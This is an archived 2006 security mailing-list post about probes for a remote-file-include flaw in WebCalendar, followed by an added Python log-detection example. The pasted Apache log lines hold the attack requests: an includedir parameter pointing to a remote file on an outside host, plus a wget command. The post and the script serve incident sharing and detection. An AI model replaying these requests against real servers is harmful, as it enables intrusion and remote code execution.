[Dshield] Webcal Exploit?
David Cary Hart
DShield at TQMcube.com
Mon Feb 6 17:57:20 GMT 2006
On Mon, 6 Feb 2006 07:16:06 -0500
"George A. Theall" <theall at tifaware.com> opined:
> On Sun, Feb 05, 2006 at 01:06:02PM -0500, David Cary Hart wrote:
>
> > Watching the apache logs, I am seeing clients looking for webcal. That usually
> > suggests that the nitwits have found a new php injection scheme.
>
> I'm not aware of anything recent. Do you have any log sample to share?
>
> There were some XSS flaws in Webcal announced last December (Bugtraq ID
> 15917), but this was not code injection.
>
> Is it possible they're targeting webcalendar rather than webcal? There
> was a remote file include flaw in its 'send_reminders.php' script
> announced last August (Bugtraq ID 14651).
>
Here was the first one. I have seen four or five since, all the same pattern
except domain instead of IPA:
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/Webcalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Webcalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/calendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/calendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/Webcal/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Webcal/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/WebCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/WebCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/webCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/webCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/Calender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Calender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/WEBCALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/WEBCALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/CALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/CALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:36:47 -0500] "GET http://68.236.166.73/webcalender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/webcalender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/calendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/calendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/Webcal/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Webcal/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/Webcalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Webcalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/WebCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/WebCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/Calender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/Calender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/webCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/webCalendar/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/webcalender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/webcalender/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/WEBCALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/WEBCALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
81.95.106.181 - - [05/Feb/2006:12:37:40 -0500] "GET http://68.236.166.73/CALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget HTTP/1.0" 302 290 "http://68.236.166.73/CALENDAR/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
--
Our DNSRBL -
Eliminate Spam: http://www.TQMcube.com
Multi-RBL Check: http://www.TQMcube.com/rblcheck.php
Zombie Graphs: http://www.TQMcube.com/zombies.php
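
Added example, not part of the original message: one way to pick this pattern out of an Apache combined-format access log is to flag requests whose query parameter value is itself a remote URL, then group by client to see the same script tried under several directory names. The function names, the threshold and the sample lines (documentation addresses and example.net) are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" log line: host ident user [time] "request" status bytes ...
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"[A-Z]+ (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) ')
REMOTE_VALUE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines, not taken from a real log.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Feb/2006:12:36:47 -0500] "GET http://198.51.100.5/Webcal/tools/send_reminders.php?includedir=http://files.example.net/a.gif?&cmd=id HTTP/1.0" 302 290 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [05/Feb/2006:12:36:47 -0500] "GET http://198.51.100.5/WebCalendar/tools/send_reminders.php?includedir=http://files.example.net/a.gif?&cmd=id HTTP/1.0" 302 290 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [05/Feb/2006:12:36:48 -0500] "GET http://198.51.100.5/calendar/tools/send_reminders.php?includedir=http://files.example.net/a.gif?&cmd=id HTTP/1.0" 302 290 "-" "Mozilla/4.0"',
    '192.0.2.77 - - [05/Feb/2006:12:40:02 -0500] "GET /calendar/month.php?date=20060205 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '192.0.2.99 - - [05/Feb/2006:13:01:15 -0500] "GET /cal/tools/send_reminders.php?includedir=http%3A%2F%2Ffiles.example.net%2Fa.gif HTTP/1.1" 404 209 "-" "-"',
]

def find_probes(lines):
    """Map client address -> requests carrying a remote URL as a parameter value."""
    by_client = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        # urlsplit handles both "/path?query" and proxy-style "http://host/path?query"
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes, so encoded "http%3A%2F%2F" values are caught too
        params = [k for k, v in parse_qsl(parts.query, keep_blank_values=True)
                  if REMOTE_VALUE.match(v)]
        if params:
            by_client[m.group("host")].append({
                "time": m.group("time"), "path": parts.path,
                "params": params, "status": int(m.group("status"))})
    return dict(by_client)

def sweeping_clients(probes, min_dirs=3):
    """Clients that requested one script name under at least min_dirs directories."""
    result = {}
    for host, hits in probes.items():
        dirs_by_script = defaultdict(set)
        for hit in hits:
            directory, _, script = hit["path"].rpartition("/")
            dirs_by_script[script].add(directory)
        swept = {s: sorted(d) for s, d in dirs_by_script.items() if len(d) >= min_dirs}
        if swept:
            result[host] = swept
    return result

if __name__ == "__main__":
    for host, scripts in sweeping_clients(find_probes(SAMPLE_LOG)).items():
        print(host, scripts)
```

The recorded status code shows how the server answered each probe, so hits that returned 200 are the ones to review first.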